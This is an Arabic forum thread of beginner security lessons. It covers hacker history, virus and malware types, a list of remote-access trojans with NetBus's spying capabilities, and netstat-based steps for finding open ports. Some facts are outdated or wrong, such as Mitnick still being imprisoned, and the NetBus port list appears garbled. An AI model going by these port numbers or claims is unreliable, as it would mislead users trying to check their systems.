المساعد الشخصي الرقمي

مشاهدة النسخة كاملة : كيف تصبح هاكر محترف ... دروس من الالف الى الياء ..



Linux Root
, Tue, 26 Jun 2007 22:29:00 +0200
الدرس الاول
تاريخ الهاكرز

الهاكرز .. هذه الكلمة تخيف كثير من الناس خصوصا مستخدمي الإنترنت .. يريدون الحماية و يريدون من ينقذهم من هذا الكابوس عالم الهاكرز هو عالم كبير و بداياته كانت قبل الإنترنت بل و قبل الكمبيوتر نفسه . حاولنا أن نجمع التاريخ هنا . تاريخ قراصنة هذا القرن . نتمنى أن تنال على رضاكم
أولا يجب أن نتعرف على الهاكر … من هو الهاكر ؟
هو الشخص الذي يستمتع بتعلم لغات البرمجة و أنظمة التشغيل الجديدة
هو الشخص الذي يستمتع بعمل البرامج أكثر من التشغيل هذه البرامج و أيضا يحب أن يتعلم المزيد عن هذه البرامج
هو الشخص الذي يؤمن بوجود أشخاص آخرين يستطيعون القرصنة
هو الشخص الذي يستطيع أن يصمم و يحلل البرامج أو انظمه التشغيل بسرعة
هو شخص خبير بلغة برمجة ما أو نظام تشغيل معين .. علي سبيل المثال قراصنة اليونكس
تاريخ الهاكرز : قبل عام 1969
في هذه السنوات لم يكن للكمبيوتر وجود و لكن كان هناك شركات الهاتف و التي كانت المكان الأول لظهور ما نسميهم بالهاكرز في وقتنا الحالي . و لكي نلقي بالضوء على طريقة عمل الهاكرز في تلك الفترة الزمنية نعود للعام 1878 في الولايات المتحدة الأمريكية و في إحدي شركات الهاتف المحلية .. كان أغلب العاملين في تلك الفترة من الشباب المتحمس لمعرفة المزيد عن هذه التقنية الجديدة و التي حولت مجرى التاريخ .
فكان هؤلاء الشباب يستمعون إلى المكالمات التي تجرى في هذه المؤسسة و كانوا يغيروا من الخطوط الهاتفية فتجد مثلا هذه المكالمة الموجهة للسيد مارك تصل للسيد جون .. و كل هذا كان بغرض التسلية و لتعلم المزيد .. و لهذا قامت الشركة بتغيير الكوادر العاملة بها إلى كوادر نسائية .
في الستينات من هذا القرن ظهر الكمبيوتر الأول . لكن هؤلاء الهاكرز كانوا لا يستطيعون الوصول لهذه الكمبيوترات و ذلك لأسباب منها كبر حجم هذه الآلات في ذلك الوقت و وجود حراسة على هذه الأجهزة نظرا لأهميتها ووجودها في غرف ذات درجات حرارة ثابتة .
و لكن متى ظهرت تسمية هاكرز ؟ الغريب في الأمر أن في الستينات الهاكر هو مبرمج بطل أو عبقري .. فالهاكرز في تلك الفترة هو المبرمج الذي يقوم بتصميم أسرع برنامج من نوعه و يعتبر دينيس ريتشي و كين تومسون أشهر هاكرز على الإطلاق لأنهم صمموا برنامج اليونكس و كان يعتبر الأسرع و ذلك في عام 1969 .
العصر الذهبي للهاكرز - 1980 - 1989
في عام 1981 أنتجت شركة IBM المشهورة جهاز أسمته بالكمبيوتر الشخصي يتميز بصغر حجمه و سهولة استخدامه و استخدامه في أي مكان و أي وقت .. و لهذا فقد بدأ الهاكرز في تلك الفترة بالعمل الحقيقي لمعرفة طريقة عمل هذه الأجهزة و كيفية تخريب الأجهزة .
و في هذه الفترة ظهرت مجموعات من الهاكرز كانت تقوم بعمليات التخريب في أجهزة المؤسسات التجارية .
في عام 1983 ظهر فيلم سينمائي اسمه ( حرب الألعاب ) تحدث هذا الفيلم عن عمل الهاكرز و كيف أن الهاكرز يشكلون خطورة على الدولة و على اقتصاد الدولة و حذر الفيلم من الهاكرز .
حرب الهاكرز العظمى - 1990 - 1994
البدايات الأولى لحرب الهاكرز هذه في عام 1984 حيث ظهر شخص اسمه (ليكس لوثر ) و أنشأ مجموعة أسماها (LOD) و هي عبارة عن مجموعة من الهاكرز الهواة و الذي يقومون بالقرصنة على أجهزة الآخرين . وكانوا يعتبرون من أذكى الهاكرز في تلك الفترة . إلى أن ظهرت مجموعة اخرى اسمها (MOD) و كانت بقيادة شخص يدعى ( فيبر ) . و كانت هذه المجموعة منافسة لمجموعة (LOD) . و مع بداية العام 1990 بدأت المجموعتان بحرب كبيرة سميت بحرب الهاكرز العظمى و هذه الحرب كانت عبارة عن محاولات كل طرف اختراق أجهزة الطرف الآخر . و استمرت هذه الحرب ما يقارب الأربعة أعوام و انتهت بإلقاء القبض على (فيبر ) رئيس مجموعة (MOD) و مع انتهاء هذه الحرب ظهر الكثير من المجموعات و من الهاكرز الكبار
الهاكرز في الولايات المتحدة
قبل البدء في الحديث عن الهاكرز في الولايات المتحدة و قصة قرصنة جريدة نيويورك تايمز . نتحدث عن (كيفن ميتنيك) أشهر هاكر في التاريخ .
كيفن متينيك قام بسرقات كبيرة دوخت الاف بي آي و لم يستطيعوا معرفة الهاكر في أغلب سرقاته .. في مرة من المرات استطاع أن يخترق شبكة الكمبيوترات الخاصة بشركة Digital Equipment Company و تم القبض علية في هذه المرة و سجنه لمدة عام . و بعد خروجه من السجن كان أكثر ذكاء . فكانوا لا يستطيعون ملاحقته فقد كان كثير التغيير من شخصيته كثير المراوغة في الشبكة .. من أشهر جرائمه سرقة الأرقام الخاصة ب 20000 بطاقة إئتمان . و التي كانت آخر جريمة له تم القبض بعدها علية و سجنه لمدة عام . ولكن إلى الآن لم يخرج من السجن لأن الإف بي آي يرون بأن كيفن هذا خطير و لا توجد شبكة لا يستطيع اختراقها
ظهرت اصوات تطالب الحكومة بالإفراج عن كيفن و ظهرت جماعات تقوم بعمليات قرصنة بإسم كيفن من بينها قرصنة موقع جريدة نيويورك تايمز و التي ظهرت شاشتها متغيرة كثيرا في مرة من المرات و ظهرت كلمات غريبة تعلن للجميع بأن هذه الصفحة تم اختراقها من قبل كيفن ميتنيك . ولكن تبين بعد ذلك بأنه أحد الهاكرز الهواة المناصرين لميتنيك
الهاكرز في الدول العربية
للأسف الشديد كثير من الناس في الدول العربية يرون بأن الهاكرز هم الأبطال بالرغم – كما ذكرنا سابقا – بأن العالم كله غير نظرته للهاكرز بعد خبر القبض على ميتنيك . فمنذ دخول الإنترنت للدول العربية في العام 1996 و الناس يبحثون عن طرق القرصنة الجديدة و كثير من الناس تعرضوا لهذه المشكلة . – آخر الإحصائيات ذكرت بأن هناك أكثر من 80 % من المستخدمين العرب أجهزتهم تحتوي على ملف الباتش و الذي يسهل عمل الهاكرز – و كثير من الناس – في الدول العربية – يجد بأن هناك فرق كبير بين ما يمسى بالهاكرز أو الكراكر .. ولكن الإسمان هما لشخص واحد و هو القرصان الفرق البسيط بينهما هو :
الهاكرز 95 % من عملة يقوم به في فضاء الإنترنت
أما الكراكر أو ما يمكن ان نسميه بسارق البرامج فهو يقوم بعملة في اغلب الأحيان دون الحاجة للإتصال بالشبكة فهو يقوم بفك شيفرة البرامج و أغلب الكراكرز هو هاكرز .. و كثير منهم يقوم بهذه العملية – أي سرقة البرامج و توزيعها مجانا – لهدف فمنهم من يضع ملف الباتش بين ملفات هذا البرنامج

Linux Root
, Tue, 26 Jun 2007 22:34:06 +0200
الدرس الثاني
الفيروسات
تعريف الفيروسات




هي برامج يتم انتاجها خصيصا لكي تلحق نفسها ببعض البرامج المشهورة وذلك عن طريق تزييف أو تعديل بسيط للتوقيع الخاص بالبرنامج الاصلي(مجموعة الأرقام الثنائية) و تتمكن هذه البرامج من تدمير البرامج و المعلومات أو اصابة الأجهزة بالخلل بعدة طرق فمنها ما يبدأ بالعمل مباشرة عند الإصابة و بعضها عند تنفيذ بعض الأوامر و البعض الاخر عندما يحين التوقيت و التاريخ المبرمج سلفا كما تتميز هذه الفيروسات بقدرتها على التكاثر و الإنتقال من جهاز الى اخر عن طريق الملفات المتبادلة بين المستخدمين


أنواع الفيروسات




يتم تصنيف الفيروسات على أساس طريقة هجومها (طريقة الإصابة بها) فهناك


Boot Sector Virus
تعتبر من أقدم الفيروسات المعروفة لدى المستخدمين حيث تستطيع ان تصيب القرص الصلب و الأقراص اللينة و تنتشر عن طريقها من مستخدم الى اَخر و تكمن خطورة هذا النوع من الفيروسات في قدرتها على اصابة جزء أساسي من أي قرص صلب أو لين و هو الجزء المخصص لتوجيه الجهاز في كيفية تحميل برنامج نظام التشغيل و يقوم هذا الفيروس بتحميل نفسه للذاكرة في كل مرة يتم فيها تشغيل الجهاز


File Infector Virus هذا النوع من الفيروسات يلحق نفسه كملف في أي برنامج تنفيذي و يتميز هذا النوع من الفيروسات بقدرته على الإنتشار بعدة طرق و بسرعة مهولة منها الأقراص اللينة و الأقراص المدمجة و رسائل البريد الإلكتروني كملف ملحق كما يمكنه الإنتقال من البرامج المجانية و المتوفرة في الإنترنت و تكمن خطورته في قدرته على الإنتشار السريع و اصابة بقية الملفات الموجودة في البرامج التنفيذية الأخرى


Macro Viruses هذا النوع أيضا سريع الإنتشار بين المستخدمين خاصة أنه قادر على الإنتشار بكل الطرق كالأقراص اللينة والمدمجة و البريد الإلكتروني و البرامج المجانية و كذلك أثناء تحميل أو تنزيل البرامج من الأجهزة الخادمة
و من الجدير بالذكر أن هذا النوع لا يصيب الا البرنامج التطبيقي التي صمم ليصيبه أساسا فمثلا لو كان هناك فيروس مصمم ليصيب برنامج تحرير الكلمات و النصوص فإنه لايستطيع الحاق الأذى ببرنامج اَخر مثل برنامج قواعد المعلومات و هكذا و لكن يستطيع أن يصيب أي ملف تم انشاؤه بواسطة البرنامج المستهدف



كيفية عمل الفيروسات




يقوم من أنشأ أو برمج الفيروس ببرمجة الفيروس و توجيه الأوامر له حيث يقوم بتحديد الزمان و متى و كيف يبدأ الفيروس بالنشاط و عادة ما تعطى فرصة كافية من الوقت للفيروس حتى يضمن حرية الإنتشار دون أن يلفت الإنتباه ليتمكن من إصابة أكبر عدد ممكن من المستخدمين ، و تختلف الفيروسات من حيث بدأ النشاط فهنالك من يبدأ بتاريخ أو وقت محدد و هنالك من يبدأ بالعمل بعد تنفيذ أمر معين في البرنامج المصاب وهناك من الفيروسات يبدأ بالنشاط بعد التكاثر و الوصول الى رقم معين من النسخ


و بعد أن ينشط الفيروس يقوم الفيروس بعدة أنشطة تخريبية حسب الغرض من انشاء ذلك الفيروس فهنالك ما يقوم بعرض رسالة تستخف بالمستخدم أو تقوم بعرض رسالة تحذيرية عن امتلاء الذاكرة وهناك انواع اخرى تقوم بحذف أو تعديل بعض الملفات وهناك من يقوم بتكرار ونسخ نفسه حتى يشل جهازك تماما و هناك انواع اشد فتكا فتقوم بمسح كل المعلومات من قرصك الصلب




أشهر الهجمات الفيروسية




لقد بدأت الفيروسات بالإنتشار في منتصف الثمانينات من القرن الماضي و منذ ذلك الوقت تطورت وظهرت أنواع أكثر شراسة و سرعة خاصة مع نهاية عقد التسعينات و لقد وصل العدد المعروف من الفيروسات الشهيرة و النسخ المعدلة منها الى أكثر من خمسين ألف فيروس و هي في ازدياد كل يوم وهنالك الاف من الفيروسات الجديدة الفتاكة و المتواجدة داخل المختبرات و مراكز الأبحاث في دول عديدة وهي مخزنة كأسلحة الكترونية ضد الأعداء في حالة الحرب لتخريب أجهزة الكمبيوتر التابعة للعدو


أشهر الفيروسات التي أنتشرت بطريقة وبائية و بسرعة فائقة لتصيب الملايين من الأجهزة حول العالم


Melissa Virus فيروس ميليسا و هي من أسرع الفيروسات التي أنتشرت في عام 1999 و هي من نوع ماكرو فيروس متخصص في اصابة البريد الإلكتروني وهي تقوم بالإنتشار عن طريق الإلتصاق في برامج النصوص كملحق في رسالة البريد الإلكتروني وما أن يقوم المستخدم بفتح الملف الملحق بالرسالة الا و يبدأ الفيروس بالعمل حيث يستطيع الوصول الى قائمة المراسلة الخاصة بالمستخدم ليقوم بإرسال نفس الرسالة الى أول خمسين عنوان دون علمك و تستمر على نفس المنوال


Explore Zip وهو فيروس مشابه للسابق و لكنه مدمر أكثر حيث يقوم بمسح كل الملفات التي أنشأت بواسطة برنامج لتحرير النصوص


Bubble Boy مشابة للسابق


CIH Virus
وهو من أخطر الفيروسات لأنه قادر على مسح القرص الصلب و اصابة البرنامج الأساسي المسؤول عن المخرجات و المدخلات للجهاز مما قد يتسبب في تلف اللوحة الأم


Love Virus فيروس الحب و هو مشابه لفيروس مليسا و لكنه متخصص في إصابة برنامج مايكروسوفت أوت لوك لإدارة البريد الإلكتروني و لقد أثار الرعب في بداية هذا العام نتيجة لسرعة انتشاره



كيفية الوقاية




طبعا ليس هناك أفضل من الحصول على برنامج متخصص ضد الفيروسات مع متابعة تحديث البرنامج كل شهر وكذلك الحذر من فتح الملفات الملحقة في الرسائل الإلكترونية و لمزيد من المعلومات يرجى الإطلاع على المقالة الخاصة بهذا الخصوص
أمن البريد الإلكتروني (http://javascript%3cb%3e%3c/b%3E:if%28confirm%28%27http://safola.com/emailsecurity.chtml%5Cn%5CnThis%20file%20was%20not %20retrieved%20by%20Teleport%20Pro,%20because%20it %20is%20addressed%20on%20a%20domain%20or%20path%20 outside%20the%20boundaries%20set%20for%20its%20Sta rting%20Address.%5Cn%5CnDo%20you%20want%20to%20ope n%20it%20from%20the%20server?%27%29%29window.locat ion=%27http://safola.com/emailsecurity.chtml%27)
البرامج المضادة للفيروسات



هي البرامج التي تقوم بحمايتك من هجمات الفيروسات و بقية البرامج التي تشكل تهديدا امنيا على معلوماتك وتستطيع أن تحدد هذه الملفات الضارة القادمة من أي مصدر مثل الأقراص المدمجة و الأقراص اللينة و الرسائل الإلكترونية و كذلك يمكنها رصد هذه البرامج في القرص الصلب وتتمكن هذه البرامج من مسح أو تعطيل عمل البرامج المهددة لسلامة الجهاز و ملفات البرامج الموجودة على جهازك و يتكون برنامج مضاد الفيروسات من جزئين مختلفين


التشغيل المباشر عند الدخول
وهذا الجزء يعمل تلقائيا عند تشغيل(الدخول) البرامج أو تنزيل الملفات من الإنترنت وهو ما يعرف ب
On Access element


التشغيل عند الطلب
وهذا الجزء يعمل عندما تطلب أنت منه ذلك و هو متخصص بالكشف عن الفيروسات و أحصنة طروادة في القرص الصلب و الأقراص اللينة و الأقراص المدمجة وهو مايعرف ب
On Demand element





كيفية عملها




ان البرامج المضادة للفيروسات عبارة عن تقنية مسح و رصد للبرامج الشبوهه التي تتميز بخصائص معينة أو تحتوي على صيغة معينة من البرمجة عبارة عن مجموعة من الأرقام الثنائية وهي التي تعرف ب (التوقيع) و يتم ذلك بالطريقة التالية


يقوم البرنامج المضاد بالنظر الى كل الملفات و البرامج ذات الطبيعة التنفيذية
تتم مقارنة التوقيع الموجود على كل ملف بالتواقيع المخزنة في قاعدة المعلومات الخاصة بالبرنامج المضاد للفيروسات


و الجدير بالذكر أن كل برنامج مضاد للفيروسات يحتوي على توقيع أكثر من 40000 نوع من الفيروسات و أكثر من عشرة الاف من تواقيع أحصنة طروادة و الديدان كما أن كل شركة منتجة للبرامج المضادة للفيروسات تقوم بتحديث و اضافة المزيد من هذه التواقيع كل يوم


بعد عملية المقارنة يقوم البرنامج المضاد بإكتشاف الفيروس أو حصان طروادة و يقوم بإعلام المستخدم عنه
يقوم البرنامج المضاد بتخيير المستخدم بين مسح أو تعطيل الفيروس أو بإصلاح الخلل بطريقة اَلية


تكنولوجيا الكشف




يقوم مصنعي و مبرمجي الفيروسات عادة بتعديل أو تحريف التوقيع الأصلي لبعض البرامج الشهيرة و ذلك لتضليل المستخدم و البرنامج الأصلي و تقوم تكنولوجيا الكشف عن هذا التزوير و التعدبل بواسطة المقارنة السريعة بين التواقيع الأصلية و المزيفة


مدى الإعتمادية على هذه البرامج




ليس هنالك برنامج مضاد للفيروسات قادر على حمايتك مائة في المائة و لكن اذا قمت بالتحديث المستمر لبرنامجك كل اسبوع فإنك سوف تحصل على حماية تصل الى 95% و ذلك لأن هنالك أكثر من ستمائة من الفيروسات الجديدة و أحصنه طروادة تظهر كل شهر


تكاليف البرامج المضادة للفيروسات و أشهرها




ان البرامج المتخصصة في الحماية من الفيروسات رخيصة الثمن و لا تتعدى اربعين دولار و لذلك احرص على اقتناء واحدة لحمايتك من الفيروسات و أحصنة طروادة


نصائح عامة بخصوص برامج الفيروسات




دائما قم بشراء برنامج من شركة متخصصة تقوم بخدمة التحديث الدائم مجانا عبر شبكة الإنترنت لمدة عام على الأقل من تاريخ شراؤك للبرنامج و قم بتجديد البرنامج لديك كل اسبوعين أو كل شهر على الاكثر لأن هنالك الكثير من الفيروسات الجديدة كل فترة و الطريقة الوحيدة لتجنب الإصابة بالفيروسات هي استمرارية التحديث لبرنامجك مع اجراء الكشف الكامل لكل الملفات الموجودة في جهازك بعد كل تحديث



مفاهيم خاطئة عن برامج الحماية من الفيروسات




لعل من أكثر المفاهيم الخاطئة بين المستخدمين على مستوى العالم هي الإعتقاد بأن اقتناء برنامج مضاد للفيروسات يمنع و يحمي من هجوم الهاكرز و المخترقين وهذا طبعا ليس صحيح حيث أن هذه البرامج تحميك فقط من الفيروسات و الديدان و تستطيع التعرف على معظم أحصنه طروادة و لكن لا تقوم بغلق المنافذ و المعابر الموجودة في جهازك و التي تمكن المخترقين من الوصول الى جهازك ومعلوماتك و لذلك فإنه من الضروري أن تقوم بالحصول على برنامج متخصص يعرف بجدران اللهب

Linux Root
, Tue, 26 Jun 2007 22:36:42 +0200
الدرس الثالث
تصنيف برامج الهاكرز



في شبكة الإنترنت هناك العديد من المنغصات و المشاكل ومن أهمها تسخير بعض البرامج من قبل بعض الأشرار واستخدامها كأسلحة فتاكة للهجوم على الأجهزة وشبكات الكمبيوتر و كذلك التجسس على معلومات بقية المستخدمين ، وتعرف هذه البرامج ب
MALICIOUS PROGRAMS
ونستعرض في هذه الصفحة تصنيفها الحديث بطريقة سهلة بعيدا عن التعمق والتعقيد حتى يسهل علينا التفريق بينهم وبالتالي امكانية حماية أنفسنا ومعلوماتنا المهمة من عبث هؤلاء الأشرار وبالتالي تجنب هجومهم على قدر الإمكان

حتى وقت قريب كان تصنيف هذه البرامج ينقسم إلى ثلاث فروع فقط وهي


الفيروسات
ديدان الإنترنت
أحصنة طروادة
ولكن مع تطور هذه البرامج والتكنولوجيا المستخدمة فيها تم تحديث طريقة التصنيف لبرامج الأشرار والتي تمكن هؤلاء الهاكرز من الوصول الى أهدافهم الغير نبيلة

التصنيف الحديث لبرامج الأشرار


برامج سريعة التكاثر والانتشار

وهي الفيروسات وديدان الإنترنت حيث أنها قادرة على التكاثر والانتشار بسرعة كبيرة لتصيب أجهزة وبرامج أخرى ، والفرق بين الفيروسات والديدان هو أن الفيروس بحاجة إلى أحد البرامج المنتشرة بين المستخدمين لكي يحتضنه وبالتالي يستطيع التكاثر والانتشار عن طريقة ، وأشهر مثال على ذلك هو فيروس مليسا و فيروس الحب حيث أن الأخير كان بحاجة إلى برنامج مايكروسوفت أوت لوك كحاضن له ، أما الديدان فهي ليست بحاجة إلى أي برنامج لكي يحتضنها
وأشهر مثال على هذا النوع هو موري وارم

برامج للتجسس وإرسال المعلومات

تقوم هذه البرامج بجمع كل المعلومات التي يريدها الهاكر وتقوم بارسال تلك المعلومات إلى مصدرذلك البرنامج حتى لو كان هناك جدران اللهب الذي يحمي ذلك الجهاز وذلك لقدرة هذا النوع من استغلال نقطة ضعف في معظم أنواع جدران اللهب التي تسمح بخروج وتصدير المعلومات من الجهاز أو الشبكة المحلية بواسطة
HTTP AND FTP
وأشهر الأمثلة على هذه الأنواع
Caligula , Marker and Groov

برامج التحكم عن بعد و الهجوم المنسق

تسمح هذه البرامج للأشرار في حال وصولها إلى أي جهاز من الأجهزة بالتحكم الكامل بالجهاز ومن أشهر الأمثلة
Back Orifice Program and Net Bus Program
أما أشهر الأمثلة على البرامج القادرة على التحكم عن بعد و التي تستطيع تسخير هذه الأجهزة لتنفيذ الهجوم المنسق و تعطيل عمل المواقع المشهورة هو برنامج
Trinoo Program
&
Tribe Flood Network(TFN)Program

برامج جديدة من أحصنة طروادة تجمع من كل بحر قطرة

هذه البرامج من أخطر أنواع أحصنه طروادة حيث أنها تستفيد من ميزة كل نوع من أنواع البرامج السابقة وذلك بالدمج بين عدة خصائص فمثلا يكون لها خاصية التكاثر مثل الفيروسات وعدم حاجتها لبرنامج محتضن تماما مثل الديدان ولديها القدرة على التعامل مع الملفات الصادرة أو الواردة من نوع
FTP and HTTP
تماما مثل برامج التجسس والنتيجة هي برنامج جديد قادر على تخطي و خداع جدران اللهب وبالتالي جمع مالذ وطاب من المعلومات من كلمات عبور وأسماء مستخدمين وأرقام بطاقات الائتمان و كذلك تدمير بعض الملفات وتعديل مهامها
وأخيرا لا بد من الاشارة إلى ضرورة الحذر والأستعانة ببرامج متخصصة للحماية وجدران اللهب الجديدة واتخاذ الاجراءات الأمنية الضرورية لتجنب الهجوم ويمكنك الاستفادة من المعلومات التي نشرناها سابقا في صفحة أمن الإنترنت أو زيارة الصفحة المخصصة للتعرف على برامج الحماية

Linux Root
, Tue, 26 Jun 2007 22:38:42 +0200
الدرس الرابع
أخطر برامج الاختراق المتداولة
ننتقل اليوم للحديث عن أهم وأشهر برامج الاختراق المتداولة مرتبة حسب خطورتها، وسأكتفي بشرح الثلاثة الأولى منها، على ثلاث مقالات أسبوعية وذلك نظراً لشهرتها وتداولها بين المخترقين : Net Bus - Back Orifice - Sub Seven - Hack a Tack - Master Paradise Deep Throat - Girl Friend 8- Net Sphere 9- Win Crash 01- Big Cluck - Executer - ICQ Torjan - Back Door.

البرنامج نت بص Net Bus

تمكن مبرمج سويدي اسمه كارل نيكتر في عام 1998 من إصدار نسخة تجريبية تعمل على الوندوز 95 من برنامج لم يطلق عليه اسما في ذلك الوقت · يستطيع مستخدم البرنامج تشغيله بواسطة كمبيوتر بعيد · هذا البرنامج سماه اتوبيس الشبكة صدرت بعد ذلك نسخ عديدة منه، اذكر منها النسخة 1,6 و 1,7 Net Bus Pro وأخيرا Bus 0002 Net .
إمكانياته
- يسمح البرنامج لأي شخص بالسيطرة على جهاز الضحية عن بعد على الشكل التالي:
1- عرض صورة مفاجئة على شاشة الضحية، أو تغيير إعدادات الشاشة دون تدخل من المستخدم
2- فتح و غلق باب سواقة السي دي تلقائيا، دون تدخل من المستخدم·
3- وضع مؤشر الماوس في مكان معين بحيث لا يمكن للمستخدم تحريكه عن هذه المنطقة ·
4 ظهور حركة للماوس دون أي تدخل من صاحب الجهاز ·
5- عرض رسالة قصيرة على الشاشة تختفي وتظهر فجأة او تبقى معلقة دائما بالشاشة فلا يستطيع المستخدم التخلص منها·
6-التجسس على المستخدم ورؤية كل ما يفعله ·
7- عـــــــرض محتويات القرص الصلب بالكامل عن بعد ·
8- إنزال أي ملف من جهاز الضحية إلى جهاز المخترق ·
9- تحميل أي ملف من جهاز المخترق إلى جهاز الضحية ·
10- التحكم في علو وانخفاض الصوت·
11- في حالة ارتباط مايكروفون بجهاز الضحية فيمكن للمخترق الاستماع لما يدور من حديث بالغرفة المتواجد بها جهاز الضحية·
12- حذف أي ملف من القرص الصلب وقت ما يشاء المخترق ·
13- إقفال أي نافذة من النوافذ المفتوحة بشاشة الضحية
14- تغيير او حذف كلمات السر الخاصة بالضحية واستبدالها بكلمات أخرى
15- تغيير إعدادات النظام بالجهاز الخاص بالضحية·
كل هذة الوظائف السابقة يمكن لأي مخترق لديه هذا البرنامج، كما هو الحال في معظم برامج الاختراق، أن ينفذها، أو بمعنى أوضح السيطرة الكاملة على جهاز الضحية ·
- بعد كل ما ذكرته، سوف يصاب أي شخص يتعرض جهازه للاختراق، بنوع من الخوف والرعب الشديد ولكن الموضوع فى منتهى البساطة، فلا تستعجلوا القرار بقيامكم بعمل فورمات للهارد ديسك لان العلم لم يكتف بذلك، فالمعروف أن كل فعل له رد فعل، بمعنى أنه عندما يوضع ملف التجسس في الجهاز فانه يوضع فى مكان معين وتوجد طرق عديدة للتخلص من هذه البرامج المؤذية، لذلك حافظ على هدوئك تماما، وابحث معي عن حلول للمشكلة، فى كل الأماكن التالية:
إن المخترق لكي يتمكن من الاختراق عليه الدخول من أحد المنافذ Ports والبرامج المضادة للمخترقين كفيلة بإغلاق تلك المنافذ في وجه المخترق؛ ولكن، حتى نقطع الطريق على المخترق، إليكم طريقة ممتازة لاكتشاف المنافذ المفتوحة وإغلاقها بطريقة يدوية من خلال الوندوز ويجب تنفيذ هذا الإجراء أثناء الاتصال بالإنترنت online حتى نتمكن من رؤية جميع المنافذ المتصلة بطريقة غير شرعية أثناء الاتصال بالإنترنت·
1- من قائمة إبدأ اختر التشغيل Start/Run
2 -عند ظهور مربع الحوار الخاص بتنفيذ الأوامر اكتب Command
3 -سيظهر لك اطار نظام التشغيل دوس وفي داخل الإطار وأمام خانة المؤشر اكتب netstat - a: ثم اضغط على Enter
4 - والآن قارن بين ارقام المنافذ التي ظهرت لك مع أرقام المنافذ التالية، وهي المنافذ التي يفتحها في العادة ملف التجسس الباتش التابع لبرنامج Net Bus فإن وجدت رقم المنفذ ضمنها، فإن جهازك قد اخترق، وعليك في هذه الحالة التخلص أولا من ملف التجسس ·
وهذه منافذ دخول برنامج النت باص :
- 43002 - 5401 - 0954 - 1176 - 0037- 1037 - 6037 - 3037 - 8037 - 92003 - 00103 - 10103 - 20103 - 73313 - 83313 - 93313
التخلص من برنامج الباتش الخاص بالنت باص واغلاق منافذه المفتوحة:
الرابط الرئيسي بين كمبيوتر المخترق وكمبيوتر الضحية هو ملف التجسس المزروع بجهاز الضحية واذا تم تحديده والتخلص منه، قطعت عليه طريق التجسس· أما المنافذ التي فتحت فهي جزء من الذاكرة يتعرف عليها الجهاز بأنها منطقة اتصال ومتى ما تم حذف ملف التجسس (الباتش) فان الوندوز يعيد إغلاق تلك المنافذ أتوماتيكيا عقب إعادة تشغيل الجهاز لأن مصدرها ( ملف الباتش) وملف الباتش قد قضي عليه تماما·
في الدرس المقبل موعدنا مع البقرة الميتة··أقصد برنامج التجسس البقرة الميتة وطرق مكافحته - فى العدد القادم سوف نتناول شرح لبرنامج Black Orifice أو البقرة الميتة وطرق مكافحته ومنافذ

Linux Root
, Tue, 26 Jun 2007 22:41:00 +0200
الدرس الخامس
طريقة إغلاق البورتات المفتوحة


سبق وأن تطرقنا إلى طريقة الكشف عن البورتات ( المنافذ ) المفتوحة في جهازك، والآن سنتعرف على طريقة إغلاق هذه المنافذ.

إنها مشكلة معروفة ومعتادة.. تنفذ أمر "netstat -a" على الويندوز، وترى عدد من المنافذ بحالة "LISTENING" أو "ESTABLISHED".
يعني ذلك أن بعض التطبيقات تعمل متخفية وبالتالي تُبقي المنافذ التي تستخدمها مفتوحة لأي اتصال قادم.
تكمن المشكلة في معرفة أيّ تطبيق هو الذي يبقي المنفذ مفتوحاً، ومن ثم يتم إغلاق هذا التطبيق.
فمن غير معرفة ذلك، يمكن أن يكون تروجان بداخل جهازك ويتم السيطرة عليه، أو غيره من التطبيقات التي تعمل دون علمك.
و لذلك يجب عليك التحرّي لمعرفة ما يُنصت في جهازك.

استخدام Inzider :
<!--[if !supportEmptyParas-]> Inzider هو برنامج بسيط يمكّنك من عرض جميع التطبيقات الفعّالة بالجهاز وأرقام المنافذ (البورتات) التي تستخدمها.
يمكنك تحميله من المواقع التالية: اضغط هنا للتحميل (( 1 )) (http://javascript%3cb%3e%3c/b%3E:if%28confirm%28%27http://ntsecurity.nu/cgi-bin/downloads/inzider.exe%5Cn%5CnThis%20file%20was%20not%20retri eved%20by%20Teleport%20Pro,%20because%20it%20is%20 addressed%20on%20a%20domain%20or%20path%20outside% 20the%20boundaries%20set%20for%20its%20Starting%20 Address.%5Cn%5CnDo%20you%20want%20to%20open%20it%2 0from%20the%20server?%27%29%29window.location=%27h ttp://ntsecurity.nu/cgi-bin/downloads/inzider.exe%27)(( 2 )) (http://javascript%3cb%3e%3c/b%3E:if%28confirm%28%27http://packetstorm.securify.com/NT/audit/inzider.exe%5Cn%5CnThis%20file%20was%20not%20retri eved%20by%20Teleport%20Pro,%20because%20it%20is%20 addressed%20on%20a%20domain%20or%20path%20outside% 20the%20boundaries%20set%20for%20its%20Starting%20 Address.%5Cn%5CnDo%20you%20want%20to%20open%20it%2 0from%20the%20server?%27%29%29window.location=%27h ttp://packetstorm.securify.com/NT/audit/inzider.exe%27)
[ Inzider v1.2 : 250 KB ]

* ملاحظة: قد تظهر لك الرسالة التالية بعد التحميل:
"GkWare SFX Module V1.90/Is - The data section attached to this self-extractor has been damaged. Please download this file again to get a complete copy."
عند ظهورها يجب عليك إعادة تشغيل الجهاز وتشغيل ملف التحميل مرة أخرى.


مثال حول طريقة العمل:

C:WINDOWS> netstat -a
<!--[if !supportEmptyParas-]> Active Connections
<!--[if !supportEmptyParas-]> Proto Local Address Foreign Address State
<!--[if !supportEmptyParas-]>TCP gwen:137 GWEN:0 LISTENING
TCPgwen:138 GWEN:0 LISTENING
TCPgwen:nbsession GWEN:0 LISTENING
UDPgwen:tftp GWEN:0 LISTENING
UDPgwen:nbname *:*
UDPgwen:nbdatagram

<!--[if !supportEmptyParas-]> في الأعلى يظهر لنا أن NetBIOS/IP قد تم تفعيله ( المنافذ 137، 138، nbsession، nbname، nbdatagram ).
مما يعني أن الجهاز يستخدم كسيرفر سامحاً للأجهزة بالشبكة في مشاركة الملفات أو استخدام الطابعة مثلاً.
ولكن يظهر لنا أيضاً TFTP ( البورت UDP/69 ) مفتوح، وذلك غريب بعض الشيء! حيث أن TFTP اختصار لـ ( Trivial File Transfer Protocol ) تعني أنه يسمح لإرسال واستقبال الملفات من غير رقيب.
لمعرفة ما هو سبب بقاء ال TFTP مفتوحاً.. نستطيع تشغيل برنامج Inzider ونجعله يقوم بتحليل النظام. النتيجة ستظهر إلى حدّ ما هكذا:

